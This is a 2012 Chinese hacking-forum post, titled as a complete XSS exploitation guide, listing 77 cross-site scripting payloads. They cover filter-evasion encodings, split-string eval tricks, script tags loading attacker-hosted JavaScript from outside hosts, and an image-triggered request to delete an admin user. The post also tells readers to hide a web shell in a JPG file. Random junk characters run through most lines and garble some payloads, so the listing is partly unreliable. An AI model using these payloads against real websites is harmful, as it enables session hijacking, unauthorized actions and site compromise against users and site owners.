找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2111|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell" X: B& P# L6 b0 Z8 K
XSS跨站代码  <script>alert("")</script>9 S7 n% S' J$ h
/ S5 K# v8 W: W7 R
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马7 b2 T0 F' o+ `6 e
, ?3 q# F1 Q, g  p( m
/ c% Z$ f! U8 N
% K% o4 G8 |2 t
1)普通的XSS JavaScript注入
0 `; P+ J( s7 o0 S4 a3 Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 @. a$ w8 c: l7 B: t2 B6 }# F$ E1 @% k: s: _# r+ |: {
(2)IMG标签XSS使用JavaScript命令' t, E) C0 v; n, J1 b  l* Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ @* m4 X& a  V* U7 m- d% x
9 d1 [; k+ C3 V8 ]6 b( M(3)IMG标签无分号无引号
2 _) g" p+ b8 ~3 _. G/ Y<IMG SRC=javascript:alert(‘XSS’)># p& h/ ~0 E- `7 B3 Y) z

5 A4 {1 P( U: U$ o  R3 U(4)IMG标签大小写不敏感
) M- l4 a! [7 |. t<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 g. ]  }- C) k  j, ?( }% w$ h* d! g5 T
(5)HTML编码(必须有分号)
( L" t- G. R! v<IMG SRC=javascript:alert(“XSS”)>8 @" [4 v* M8 m7 A

. ?) _+ j% D2 W7 s% k/ n(6)修正缺陷IMG标签
8 [& V1 n: y' o1 O' ^<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# m9 {" s& S$ R- i0 `6 @0 m+ p, |* t& N  ~' n
(7)formCharCode标签(计算器)
0 _; G, P) X5 R4 \& a% S  B% E6 R4 a<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( Z& z% N0 x0 Q; X; X9 O. E9 M* o9 P+ \
(8)UTF-8的Unicode编码(计算器)
! o" F6 M; j: m' R& q3 r1 I<IMG SRC=jav..省略..S')>: K0 b/ J. U; ^% u- }
! x& n: }( Z% D
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- M; Q& r3 c6 k9 P7 Z
<IMG SRC=jav..省略..S')>
. q- {1 m  ]7 d2 b
/ Y! x# l* ^' ^3 D(10)十六进制编码也是没有分号(计算器)" n% j% a* \% I0 J) G) S- d4 H
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
9 \8 U5 Y1 G( t. l: u' X2 m
, Q! P% u4 R! y2 E(11)嵌入式标签,将Javascript分开5 U- Q& G7 N3 ~1 k6 g$ A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: }; s8 r( U$ j5 L- c: g) T4 A  y, e  t+ M% x% }* F, Q! O# ]: S
(12)嵌入式编码标签,将Javascript分开
+ k& ]# p( `  S% ~<IMG SRC=”jav ascript:alert(‘XSS’);”>
) |# g4 E* Z4 p. }* \+ ?+ ?/ G" U. l; @+ w
8 h; ^3 @0 Y9 }( l  n(13)嵌入式换行符
+ X6 O! H- u" l" f9 B<IMG SRC=”jav ascript:alert(‘XSS’);”>! p. A1 A$ R! K: d

2 F. T) [0 s" ^# D: J(14)嵌入式回车9 h  l2 ]& {: [; N0 k, H# n6 C
<IMG SRC=”jav ascript:alert(‘XSS’);”>: q: {& m4 W9 E5 L+ v( C* a
6 {! s  T* H) ~1 Y% p- ^
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* e" j* ^8 C( |1 Z* L<IMG SRC=”javascript:alert(‘XSS‘)”>
$ r# ~: E* P9 J1 ]5 l% l( s( M% H; k3 e
(16)解决限制字符(要求同页面)
* z7 h4 @9 ]3 F: A5 `" e% O/ X<script>z=’document.’</script>$ I$ A- l0 C5 U; l9 {7 \
<script>z=z+’write(“‘</script>/ D5 K8 F" Y7 z- i/ @0 v
<script>z=z+’<script’</script>
/ H! s- W9 a5 S( M& G<script>z=z+’ src=ht’</script>
. P: Y5 F/ W$ t<script>z=z+’tp://ww’</script>" [6 n. m$ y  P4 O# L
<script>z=z+’w.shell’</script>
% Z& d4 ?1 B! x& m9 ~8 o<script>z=z+’.net/1.’</script>& q+ d- c0 h4 s% ~$ g
<script>z=z+’js></sc’</script>
  b; _' c% R# F8 t, |" j<script>z=z+’ript>”)’</script>
+ Q( v% `/ h" h$ @( z<script>eval_r(z)</script>) g$ b& d  g* I% j' @

, f1 g6 R7 G. ^(17)空字符
+ [5 V; j1 c* l2 h" I& B) mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 e! Y2 O6 h) S5 J8 a
* D2 a4 z0 [" V! t6 r(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* Q* i6 G2 d$ s/ Pperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! ?2 H3 v% I2 }+ j; h+ |. h

" |1 `! Y3 d3 T% b- j6 b, }1 B' }(19)Spaces和meta前的IMG标签
8 w- h  O% ~. U& @2 |<IMG SRC=” javascript:alert(‘XSS’);”>3 z& z8 J# L1 Z
# _6 f/ F% U: o) M2 p, Q  h
(20)Non-alpha-non-digit XSS
% l+ O% f; _/ v1 B' P0 `! `<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 G5 K' d  d  R( f3 K

: _$ }: c: W1 a. S/ q. z8 w: p(21)Non-alpha-non-digit XSS to 2
, _# Q+ B: K* M& v) z<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' |6 N7 r4 W2 k8 Q8 O; `
5 l8 f8 |/ d! t! p  S( B(22)Non-alpha-non-digit XSS to 3( k7 P, |! h# ]6 o$ k. k
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 E8 K  u$ q3 D) W0 r* D  l  Z1 \" E3 Z/ u
(23)双开括号
3 D( x2 ]8 Q8 _: R<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ U' m" B# O! C" f3 e* r9 l$ X1 x1 h9 e: g* n4 q; j; a3 M
(24)无结束脚本标记(仅火狐等浏览器)
" h0 [1 [4 z9 h9 T/ O* {- e<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 Z; f& \( m) v' V# c1 q5 M; @+ {* B4 N4 G) G
(25)无结束脚本标记2
0 F' D3 a" I  |# G<SCRIPT SRC=//3w.org/XSS/xss.js>
, f2 L& z% }* q2 Y
1 t+ C* N) Y1 G( D(26)半开的HTML/JavaScript XSS
& e8 w& \  z+ d+ O6 Z5 u! @<IMG SRC=”javascript:alert(‘XSS’)”
  s$ l, ~5 z3 L7 j. t. Q8 o& U) j. ~8 Y- }9 t, r
(27)双开角括号
# v0 J7 e  S8 n2 c$ j- v<iframe src=http://3w.org/XSS.html <
; e! f! H$ m& R+ m8 t+ T; _4 D6 C( |( e9 ^# D9 c$ g
(28)无单引号 双引号 分号
8 {& j2 s  J) ^1 Y<SCRIPT>a=/XSS/& l) c* s" Q! P1 B3 m7 `& v
alert(a.source)</SCRIPT>( [& u0 Y4 f, s1 m; [

+ w. u6 v; H( K. I, ~, p9 U6 g(29)换码过滤的JavaScript" J' R! x8 q& M( y4 b# p% [
\”;alert(‘XSS’);/// ^! O; J1 ^2 N9 `( n) y, O- }

- b8 Y3 C$ h) S# `(30)结束Title标签' s0 L" Y/ G) C: x( [; ]$ c1 B
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; O, ^& Y: Y; D6 g3 ^. _" D3 |; ~7 M, e5 z1 H) E
(31)Input Image
8 k& w; S0 x3 z& M, z. P<INPUT SRC=”javascript:alert(‘XSS’);”>8 @. A! Y/ }- F

/ m$ k8 g7 m9 o(32)BODY Image
( M. I3 s5 E. B3 S; d<BODY BACKGROUND=”javascript:alert(‘XSS’)”>! o: l3 Q- B( N) ~# Y, _: l

( d3 L! f, u7 D4 u7 R' ^" |(33)BODY标签3 s  n$ M3 o1 ]2 C
<BODY(‘XSS’)>; _- d' S" f: y6 c, `* C
  @1 R% Y$ l; m" R
(34)IMG Dynsrc
( D" g- K9 K7 f  o  H0 z' \8 l<IMG DYNSRC=”javascript:alert(‘XSS’)”>! z1 P: _% f; q. L  {; O& U
. s8 l9 f5 ~$ X  t  d9 q( X2 k
(35)IMG Lowsrc
. _. }  Y# [# U. p4 y: h<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ @. p8 X* s+ @$ a8 \# S% S" u9 O: M7 N" F; ~- w* \
(36)BGSOUND
5 p- L1 C2 k* M9 m3 ]4 I<BGSOUND SRC=”javascript:alert(‘XSS’);”>" Q* \1 X- U7 _4 o7 K1 ?
" V, C' v! e! X' [! ~8 M9 v
(37)STYLE sheet9 L' i/ y. N& g! T% L
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& b1 P  }- o- n' Z3 v+ _8 N

% L+ n$ v4 ]6 R(38)远程样式表; d7 I% M- U% ?( J$ @
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
3 b. f  ]& M2 `3 {7 H+ |0 N* h/ ]# P2 e1 F
(39)List-style-image(列表式)
- @; j+ M7 D7 I, P<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 K% |- R; z' N& m
4 ~! R# ~9 R4 _0 F1 n: ]) t
(40)IMG VBscript# t1 ^5 P  O+ a( X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 D8 H$ K& i( @
8 q# u0 d$ e3 S  e  Y9 W$ C(41)META链接url5 _' a* ~4 l9 J3 X1 _
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”># f" I6 _, v) o3 `$ N

2 g+ K& Z" ^  U+ R. ~(42)Iframe
5 S1 ?4 ~9 }; M% o<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; u) |/ |: n/ `# l( }& F# d( b0 C(43)Frame3 r) ^3 k4 @, _% d+ ^& f
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>% U$ t6 w4 ]: D8 u
/ Y& f/ U7 ]* D# D) \4 x
(44)Table
. ~* Z& h: j& E<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 o4 _, C; K; ~: o. i0 l
2 h5 U0 ]; M0 `# i  [- d(45)TD) z2 v! F, d+ o2 x
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ `6 `+ \1 D* R4 G8 M% S8 z
) d( m+ h/ U* @* ~! T(46)DIV background-image' B: J& B0 v9 @  N/ s* B2 |8 K6 h
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' m# P2 f- s5 T/ ~( b+ r9 [4 T

' |# }/ c  j0 q' _: M: R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) k8 I- h$ N5 ?" L+ f6 E<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>/ ~4 v; D. r( Q/ i. `# C2 i" m

6 r+ @; b# }2 _( u- D* F8 R(48)DIV expression
! q3 l+ h7 V0 t( F, l8 A3 V<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 E! O5 y1 A4 Y# x
0 V7 M, A# \$ M) b/ x
(49)STYLE属性分拆表达
. d2 @  L; M7 ?: Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( A3 G: B' l. N$ R5 j
. ]8 z4 d& P# |3 \9 y- x(50)匿名STYLE(组成:开角号和一个字母开头)! A+ l; T1 p6 L" K
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 o' R. s7 W% B$ b- t

+ r: b- R4 y# `2 l- }' v(51)STYLE background-image' Y4 w0 v8 n; N. h# p" F
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>8 l; W1 _0 @! H: f' W% ?+ y% T; R
! u3 |/ @' O/ A
(52)IMG STYLE方式$ {: F# Z4 G# Y1 H6 \" j' h0 I( G
exppression(alert(“XSS”))’>
. z( Y( \3 ]1 e) J
7 k9 N6 D. K( h(53)STYLE background) w- T3 G: _9 R2 h1 O6 w8 H
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% S( u7 a& {) t  e( D0 X: p5 O: w! P9 C# L8 q8 ^
(54)BASE6 I/ R, e! E# C" ~
<BASE HREF=”javascript:alert(‘XSS’);//”>
2 Z5 A. b6 r& ^) P, n- C8 L9 ~' j# ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
* K2 @7 R0 b' v9 J5 y! v  X<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
1 Y# g% S4 [! R* D
+ r1 a' B6 Q0 O; R( d(56)在flash中使用ActionScrpt可以混进你XSS的代码
4 l9 j* L) g1 ~7 Ha=”get”;4 p* q3 Q# ?9 w8 I2 h0 @; M/ I
b=”URL(\”";5 i" M$ g4 G: k% l" o8 I. n, u
c=”javascript:”;  m/ z' x& w) i* P# V9 z- ]
d=”alert(‘XSS’);\”)”;9 y4 W1 x% p2 k, J) [7 u
eval_r(a+b+c+d);5 z- d. Y; O" j
/ D) F1 X8 {& G2 p  ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' I; u5 {# g$ V3 e+ F8 W<HTML xmlns:xss>0 ~  @$ [3 K2 t" M2 q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>9 W1 C# i! Q$ P# g5 n
<xss:xss>XSS</xss:xss>
! L5 ~* p* j8 |; e& @</HTML>5 w7 w+ ]0 e3 {) y
' [1 P; K2 I- p# D$ f0 Y! U' {
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ Q# v  Q8 t( m4 C) Z9 F: ?* {
<SCRIPT SRC=””></SCRIPT>4 Z+ J5 L: x: p
+ Z. u. M- o& Y5 x
(59)IMG嵌入式命令,可执行任意命令0 [6 S1 g: {* X. B& [6 Y
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 r# F/ U% v0 i5 e) X
) \* S) F. W, J$ u, X(60)IMG嵌入式命令(a.jpg在同服务器)# |9 o3 S1 q* `. k6 B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser  w$ k+ m! f7 W9 U
* K; @6 X, W( D# j+ [
(61)绕符号过滤) o8 z; ?/ x  ?6 v, ^3 T/ h/ D
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 i$ ?5 n# J/ [2 i* m( s& E" {# [( R: y" D1 f; p& G2 J$ C
(62)
1 `# i7 _& M6 Q0 i( b7 s* p! \<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 r. \9 ?* X4 w2 ^( C
$ V$ D+ P  h) q$ \& }4 j
(63); T: ]' V- N( ]) f
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# I  H. G4 I/ G7 p" V: k7 `- k$ F! @$ K; y8 @1 ]; a7 Q
(64)
, K6 C, N9 j) G<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>9 ~$ ~; g9 e/ y2 j& H- O# H

( \" T# l3 m9 j6 w+ T. n(65)( a4 X9 ?/ Z! Z7 w9 i. q$ J
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
  h- F, M' k! s4 O0 g9 J/ p* W6 D. `) n5 d0 }- y
(66)0 }* [/ k( z% X0 t, Q' ^. n0 [8 ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! [% r; y; D4 q# S; G

0 j! J, c, w5 k1 y1 l- E+ C2 w(67)* s: b. V3 k( l6 b& ?+ B7 w$ @9 f
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
% M% z9 n( {+ l- @9 q" u: z; ~1 S8 Y' `
(68)URL绕行& \. a4 }  Z9 |4 ?* B* W) h: }$ w
<A HREF=”http://127.0.0.1/”>XSS</A>( Y9 z: W5 H9 V, r$ p

0 d6 S4 l: y. s7 m  w(69)URL编码
! {: G/ C& g  H) k" s7 ?3 x<A HREF=”http://3w.org”>XSS</A>
# y- W  \7 V6 Y9 U2 u( t! a) W9 k7 J6 R
(70)IP十进制! [+ ~. u" y- K4 c6 D
<A HREF=”http://3232235521″>XSS</A>
  K2 T- R- }% X) k" f8 I9 }: Q6 O: Z- D) ?; X
(71)IP十六进制- V5 {) w# @$ L" J
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>$ P0 }6 }; e' v5 E
$ H- Z$ j; f$ U8 ?; J( j# O! o
(72)IP八进制
( ^0 _7 Z5 i! ^! e; V& _<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 I/ `7 O, v4 x/ x
1 Y0 Q+ p  q$ U9 }; s, u(73)混合编码4 L0 i5 p8 E* J4 g) X6 T- S# Z
<A HREF=”h
. e; o& B( c+ G4 h6 Htt p://6 6.000146.0×7.147/”">XSS</A>, X$ J. D2 ]1 a1 _& r+ v

2 n! X. z( l) o7 E(74)节省[http:]
" Z3 h7 ~- s7 H<A HREF=”//www.google.com/”>XSS</A>! Y! _+ f/ z9 m
* a/ }5 w  |% E( V
(75)节省[www]
, f' m5 d9 `5 V: [# A2 d( c<A HREF=”http://google.com/”>XSS</A>
$ B) |& A8 u- j3 B4 h/ B3 M( {( E% l6 I# L0 V7 d
(76)绝对点绝对DNS0 n3 I# N8 {+ n/ x
<A HREF=”http://www.google.com./”>XSS</A>
7 N+ N; u7 y2 U* ^! N! J- O/ g" `) B
(77)javascript链接
) x* L) {" C1 o" |& ^1 @; N2 [<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
% m0 Z! I2 W; n! I) D1 N* L. ]! C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表